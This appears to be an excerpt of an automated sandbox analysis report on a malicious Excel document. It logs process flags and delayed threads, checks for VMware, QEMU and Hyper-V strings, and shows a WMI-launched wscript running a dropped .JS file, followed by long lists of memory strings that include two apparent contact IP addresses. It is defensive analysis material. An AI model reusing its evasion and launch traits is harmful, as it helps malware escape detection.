Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 431Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: wscript.exe, 0000000A.00000003.2866281412.000002C652740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0L|R
Source: wscript.exe, 0000000A.00000003.2868890863.000002C652943000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2998006693.000001F1D0C94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2998006693.000001F1D0C20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2998006693.000001F1D0C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: excel.exe_Rules.xml.0.drBinary or memory string: <V V="VMWare, Inc." T="W" />
Source: wscript.exe, 0000000A.00000003.2866281412.000002C652740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: excel.exe_Rules.xml.0.drBinary or memory string: <V V="QEMU" T="W" />
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe //b "C:\Users\user\5DWDMMR9NH2K.JS"Jump to behavior
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rwinmgmts:\\localhost\root\securitycenter2memstr_7ce682d2-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcachememstr_18427142-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programsmemstr_730eadc4-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\microsoft\windows\historymemstr_d388daa9-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: software\policies\microsoft\systemcertificates\disallowedsmemstr_c1fcacc2-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: software\policies\microsoft\systemcertificates\disallowedmemstr_292a5142-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (<pdxmemstr_819b7974-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: directorymemstr_fbebdd38-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ck[xbmemstr_e175256f-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !gfd'}vmemstr_7a0c490e-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0u0usmemstr_4532fa59-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0u0u+xmemstr_777c6ef3-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\sendtomemstr_1d2f686a-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,llmemstr_06a0af98-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lrpc"memstr_fdd585dc-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5ecde1d8764dmemstr_9215d198-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :c:\windows\system32\wshom.ocxmemstr_ee378e0d-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #`<vwmemstr_7b639eda-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:p(a;oici;fa;;;ba)(a;oici;0x1200a9;;;iu)(a;oici;fa;;;sy)memstr_41cfcb7b-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0u0u[ybmemstr_d6bff2e4-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{1b1cad8c-2dab-11d2-b604-00104b703efd}memstr_adcc892a-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{4e14fba2-2e22-11d1-9964-00c04fbbb345}memstr_290c04ca-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{1be1f766-5536-11d1-b726-00c04fb926af} memstr_4374b0a3-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersmemstr_33e083c3-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersdmemstr_128b04cf-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: users@shell32.dll,-21813memstr_ba249c65-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user:memstr_60c4d26c-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favori~1memstr_1602e397-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favori~1lmemstr_3c4a794e-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hfwm.memstr_38e3aa6d-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favorites@shell32.dll,-21796memstr_3236dc63-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{4e14fba2-2e22-11d1-9964-00c04fbbb345}pmemstr_68ef5cc3-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{64b8f404-a4ae-11d1-b7b6-00c04fb926af}memstr_11029b98-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'nrt menumemstr_0c58f2ff-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}@memstr_89f6d785-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}memstr_8a680dbd-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{f6d90f16-9c73-11d3-b32e-00c04f990bb4}p[memstr_ae5d8d3d-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}wmemstr_ac481694-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\x1fw,imemstr_85dc85a4-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{e7d35cfa-348b-485e-b524-252725d697ca}`tmemstr_4d0e9500-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{f6d90f16-9c73-11d3-b32e-00c04f990bb4}memstr_82483fe7-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{e7d35cfa-348b-485e-b524-252725d697ca}memstr_d34fb29f-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b*timemstr_cdb2492e-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b+timemstr_c4e6b880-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b,timemstr_97542697-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b-timemstr_3857f721-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b.timemstr_ad725310-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b/timemstr_afdb6903-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b0timemstr_d1342451-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b1timemstr_9bda8a63-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b2timemstr_972b419b-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b3timemstr_6b8b0c78-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b4timemstr_9bfecda2-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b5timemstr_698344c0-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b6timemstr_2aa5943a-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\desktop.inilmemstr_be9a4ccc-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\propsys.dlllzmemstr_13e3bae9-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\propsys.dlllmemstr_92e60d81-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\propsys.dllmemstr_e3f03e1d-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188.105.71.44request2smemstr_f0f4bbe7-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\cfgmgr32.dllmemstr_53c256b3-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\start menu<memstr_7fbd91d1-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\desktop\desktop.ini'memstr_6a8c7d09-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 72.12.194.93exttringsmemstr_7f5f046f-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\desktop\desktop.inimemstr_0f2d8720-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |1cw!hmemstr_35218354-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: publicmemstr_2df3c4af-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: publicfmemstr_e57e9e30-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: epublic@shell32.dll,-21816memstr_00bf1a7b-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktopmemstr_06477157-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktophmemstr_f934a669-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <desktop@shell32.dll,-21799memstr_7219fe27-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [louserzedfilenamesmemstr_f96bbbe3-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrive.lnkonedrivememstr_805eca56-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [.shellclassinfomemstr_9a836901-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: louserzedresourcename@%systemroot%\system32\shell32.dll,-21782memstr_25ee31c3-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +0)p`memstr_6633eb77-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21799memstr_103269c8-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\fastprox.dlllmemstr_a364c2b4-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21786memstr_833bbe1d-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21769memstr_c4e95e96-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wbem\fastprox.dlllwmemstr_4a5d54f9-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dllememstr_5c3d4166-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\desktop.iniqmemstr_b09a6d94-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-183{memstr_0fc541a4-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21770gmemstr_42429c9e-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\desktop.ini16vmemstr_7abdd591-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-112memstr_376c7749-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12689memstr_95299fe2-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21790memstr_589964f5-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\music\desktop.inimemstr_3c45040f-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1087memstr_8626b7e0-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-126909memstr_d05974d3-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21791#memstr_29c8b1ed-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (windows phone 8.1; arm; trident/8.0; touch; rv:11.0; iemobile/11.0) like geckomemstr_d1cac743-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (windows phone 10.0; android 6.0.1) applewebkit/537.36 (khtml, like gecko) chrome/70.0.3538.102 mobile safari/537.36 edge/18.19045memstr_2cee1693-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: louserzedresourcename@%systemroot%\system32\shell32.dll,-21790memstr_f52af055-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12689memstr_06483a5b-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-108memstr_f16068b8-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconfile%systemroot%\system32\shell32.dllmemstr_cc9021c0-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-237memstr_400020b7-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rity\lomemstr_9fff1b2d-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 t x memstr_58c3aae6-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !0!p!p!memstr_38d4956d-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "8"`"memstr_f9a8cb0e-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #@#l#memstr_8c2e3e83-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $($h$l$memstr_fc9d59ac-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %d%p%memstr_9e6d87a3-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &,&l&t&memstr_bf96fe3a-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: & 'p'p'memstr_d646c64f-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '( (@(l(memstr_8a34d62e-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ($)h)l)memstr_ac44ab6b-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *(*l*t*memstr_9b16f9c3-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +<+h+memstr_e030e943-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +,0,x,memstr_a5b97547-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: louserzedresourcename@%systemroot%\system32\shell32.dll,-21779memstr_7dc7a391-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12688memstr_c57afc09-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-113memstr_1dd7a5aa-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-236memstr_da3826a5-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: louserzedresourcename@%systemroot%\system32\shell32.dll,-21791memstr_d8c0c856-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12690memstr_14272038-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-189memstr_63597ff2-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-238memstr_b5182f03-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ @!@"@#@$@%@&@'@(@)@*@+@,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@[@\@]@^@_@`@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@{@|@}@~@memstr_2ab7fe5b-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 202 (,memstr_f03a1f87-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7t;h0h<memstr_24f45cc6-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7$3t memstr_42a0e239-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0|2l#89memstr_b3377b72-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )\8t*memstr_9416cc4f-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d7l4d=memstr_93a0292e-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8@1l$d=memstr_3694dc85-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/4.0 (compatible; msie 8.0; windows phone os 7.5; trident/4.0; iemobile/8.0)memstr_56f20df5-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/4.0 (compatible; msie 7.0; windows phone os 7.0; trident/3.1; iemobile/7.0)memstr_852741dc-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 9.0; windows phone os 7.5; trident/5.0; iemobile/9.0)memstr_e3861bd6-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 9.0; windows phone os 7.5; trident/5.0; iemobile/9.0)enti@memstr_1eb8f219-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $8l`tmemstr_8e311aa8-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indgmemstr_d9167545-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ker notification windowen-gbnmemstr_44582c6c-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 10.0; windows phone 8.0; trident/6.0; iemobile/10.0; arm; touch)memstr_e7c62ecc-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 10.0; windows phone 8.0; trident/6.0; iemobile/10.0; arm; touch)hmemstr_ca4fecb3-4
